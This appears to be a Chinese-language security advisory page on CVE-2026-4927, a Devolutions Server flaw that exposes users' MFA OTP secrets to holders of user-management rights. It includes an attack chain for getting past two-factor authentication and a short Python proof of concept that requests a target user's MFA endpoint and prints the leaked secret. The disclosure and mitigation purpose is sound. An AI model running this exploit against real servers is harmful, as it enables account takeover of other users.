CVE-2026-4927 CVSS 6.5 中危

CVE-2026-4927 Devolutions Server敏感信息泄露

披露日期: 2026-04-01

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-4927

漏洞类型

敏感信息泄露

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Devolutions Server

漏洞概述

Devolutions Server在用户MFA功能中存在敏感信息泄露漏洞。由于权限控制不当，拥有用户管理权限的攻击者可以通过发送经过身份验证的API请求，获取其他用户的MFA OTP密钥。这使得攻击者能够绕过双因素认证机制，直接接管受影响用户的账户。该漏洞影响特定版本范围内的Devolutions Server，攻击复杂度低且无需用户交互，具有较高的安全风险。

技术细节

该漏洞的核心在于Devolutions Server未能对敏感的MFA配置信息实施严格的访问控制。在受影响版本中，当攻击者通过身份验证并具备用户管理权限时，可以利用系统提供的API接口查询用户详情。系统在响应这些请求时，错误地包含了用于生成TOTP（基于时间的一次性密码）的密钥（Secret Key）。攻击者通过解析API返回的JSON数据，提取出目标用户的OTP密钥。一旦获得该密钥，攻击者即可使用标准算法（如RFC 6238）在本地生成合法的验证码，从而在无需物理设备或短信的情况下通过目标的MFA验证，导致账户完全被攻陷。

攻击链分析

STEP 1

1. 信息收集与认证

攻击者获取一个具有用户管理权限的合法账户凭证，并登录Devolutions Server。

STEP 2

2. 权限验证

确认当前账户权限允许访问用户管理相关的API接口。

STEP 3

3. 发起恶意请求

攻击者构造特定的API请求，指向目标用户的MFA配置端点。

STEP 4

4. 获取敏感数据

服务器返回包含OTP密钥的响应数据，攻击者解析并提取该密钥。

STEP 5

5. 绕过MFA

利用获取的密钥生成合法的动态验证码，绕过目标账户的双因素认证进行登录。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

# Target URL (Example)
base_url = "https://target-server.com"
api_endpoint = "/api/v1/users/{user_id}/mfa"

# Attacker's credentials with user management privileges
auth_token = "ATTACKER_JWT_TOKEN"
headers = {
    "Authorization": f"Bearer {auth_token}",
    "Content-Type": "application/json"
}

# Target user ID to compromise
target_user_id = "12345"

try:
    # Send authenticated API request to fetch MFA settings
    response = requests.get(f"{base_url}{api_endpoint.format(user_id=target_user_id)}", headers=headers, verify=False)
    
    if response.status_code == 200:
        data = response.json()
        # Extract the sensitive OTP key from the response
        otp_secret = data.get('otpSecret') or data.get('mfa_secret')
        
        if otp_secret:
            print(f"[+] Successfully leaked OTP Key for user {target_user_id}: {otp_secret}")
        else:
            print("[-] OTP Key not found in response.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")

except Exception as e:
    print(f"[!] Error: {e}")

影响范围

Devolutions Server 2026.1.6

Devolutions Server 2026.1.7

Devolutions Server 2026.1.8

Devolutions Server 2026.1.9

Devolutions Server 2026.1.10

Devolutions Server 2026.1.11

防御指南

临时缓解措施

如果无法立即升级，建议暂时撤销非管理员人员的用户管理权限，并启用更严格的网络访问控制策略，仅允许受信任的IP地址访问管理API接口。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-4927
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-4927
3 Details https://www.cvedetails.com/cve/CVE-2026-4927/
4 VulDB https://vuldb.com/cve/CVE-2026-4927
5 Link https://devolutions.net/security/advisories/DEVO-2026-0010

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表